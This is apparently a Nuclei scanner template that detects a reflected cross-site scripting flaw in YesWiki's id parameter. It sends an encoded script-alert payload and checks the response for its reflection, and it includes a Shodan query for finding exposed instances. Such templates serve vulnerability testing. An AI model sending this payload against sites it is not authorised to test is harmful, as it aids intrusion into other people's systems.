id: yeswiki-xss

info:
  name: YesWiki <2022-07-07 - Cross-Site Scripting
  author: arafatansari
  severity: high
  description: |
    YesWiki before 2022-07-07 contains a cross-site scripting vulnerability via the id parameter in the AccueiL URL.
  reference:
    - https://huntr.dev/bounties/de4db96c-2717-4c0e-b7aa-eee756ca19d3/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    shodan-query: http.html:"yeswiki"
  tags: yeswiki,unauth,huntr,cve,cve2022,xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "Query failed:"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23
